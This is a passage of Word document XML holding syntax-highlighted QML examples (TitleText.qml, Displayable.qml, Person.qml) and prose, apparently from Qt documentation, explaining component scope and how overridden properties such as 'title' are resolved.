        <w:t>TitlePage</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="007A24CD" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F10942" w:rsidRPr="007A24CD" w:rsidRDefault="00F10942" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>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Item</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id</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root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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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TitleText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title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root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title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size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22</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anchors</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top</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parent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top</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TitleText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title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root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title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size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18</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anchors</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bottom</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parent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bottom</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// TitleText.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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Text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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> size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text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"&lt;b&gt;"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title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"&lt;/b&gt;"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font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pixelSize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size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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10942">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="overridden-properties"/>
      <w:bookmarkStart w:id="542" w:name="_Toc483000646"/>
      <w:bookmarkStart w:id="543" w:name="_Toc483003663"/>
      <w:bookmarkStart w:id="544" w:name="_Toc483603999"/>
      <w:bookmarkStart w:id="545" w:name="_Toc483605219"/>
      <w:bookmarkEnd w:id="541"/>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overridden Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="542"/>
      <w:bookmarkEnd w:id="543"/>
      <w:bookmarkEnd w:id="544"/>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML permits </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property names</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined in an object declaration to </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by properties declared within another object declaration that extends the first. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00F10942">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Displayable.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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Item</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lastRenderedPageBreak/>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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> detail</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Text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text</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"&lt;b&gt;"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title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"&lt;/b&gt;&lt;br&gt;"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detail</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> getTitle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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setTitle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newTitle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title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newTitle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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Person.qml</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Displayable</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> firstName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property</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lastName</w:t>
      </w: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F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F310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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fullName</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> title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 "</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firstName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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" "</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lastName </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here, the name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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is given to both the heading of the output text for Displayable, and also to the honorific title of the Person object.</w:t>
      </w:r>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="00531B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">overridden property is resolved </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>according to the scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which it is referenced. Inside the scope of the Person component, or from an external scope that refers to an instance of the Person component,</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resolves to the property declared inside Person.qml.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fullName</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function will refer to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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property declared inside Person.</w:t>
      </w:r>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inside the Displayable component, however,</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w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>refers to the property declared in Displayable.qml. The getTitle() and setTitle() functions, and the binding for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text</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of the Text object will all refer to the</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title</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property declared in the Displayable component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
